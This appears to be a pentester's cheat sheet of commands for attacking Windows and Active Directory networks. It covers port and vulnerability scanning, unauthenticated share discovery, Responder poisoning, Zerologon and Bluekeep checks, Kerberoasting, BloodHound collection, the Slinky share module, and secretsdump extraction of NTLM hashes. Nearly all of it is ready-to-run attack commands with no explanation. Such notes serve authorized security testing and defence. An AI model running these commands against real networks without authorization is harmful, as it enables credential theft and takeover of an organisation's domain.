Run nmap
mkdir scan
nmap -T4 -iL scope.txt -Pn -p21,22,139,445,3389,88,389,135,1433,3306 --open -vv -oG scan/alive.txt
nmap -T4 -sV -sC --script=banner --script=vulners -iL --top-ports 3700 scope.txt -vv -oA scan/full-tcp-res
nmap -T4 -sV -p445 -Pn -iL scope.txt -vv --script smb-security-mode --script smb-vuln-ms17-010 -oA scan/smb-scan
Run cme on all shares, find open/unauthenticated ones
cme smb smb-ips.txt -u '' -p '' --shares
Discover HTTP services
NetBIOS/LLMNR Spoofing
sudo python2 [Responder.py](<http://responder.py/>) -I eth0 -wrFP
DC Sync / Zerologon
git clone <https://github.com/SecuraBV/CVE-2020-1472>
pip install -r requirements.txt
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
Bluekeep
git clone <https://github.com/robertdavidgraham/rdpscan.git>
make
rdpscan 192.168.1.1-192.168.1.255
Password spray the DC
Checking default credentials embedded devices
Checking "dumb-ports”
Kerberoasting
python3 [GetUserSPN.py](<http://getuserspn.py/>) -request -dc-ip <dc ip> acme.corp/JOHNNY.WALKER -o tickets.txt
Bloodhound
bloodhound-python -u "USER" -p "PASS" --dns-tcp -ns <dc ip> -dc somedc.acme.corp -d amce.corp -c all
Slinky - Expand Access
cme smb hosts.txt -u 'user' -p 'pass' -M slinky -o NAME=0123
Shares
cme smb hosts.txt -u 'user' -p 'pass' --shares | tee auth-user-1
cat auth-user-1 | grep -ai "read\\|write"
smbclient.py user@ip
# You can also try ftp shares with these creds with limited success.
# Perhaps also ssh ;)
Dump Passwords & Crack
python3 secretsdump.py -just-dc-ntlm CORP/[email protected] | tee -a dump
cme smb ips.txt -u 'user' -p 'pass' --pass-pol # for screenshot for finding
WADComs - An interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.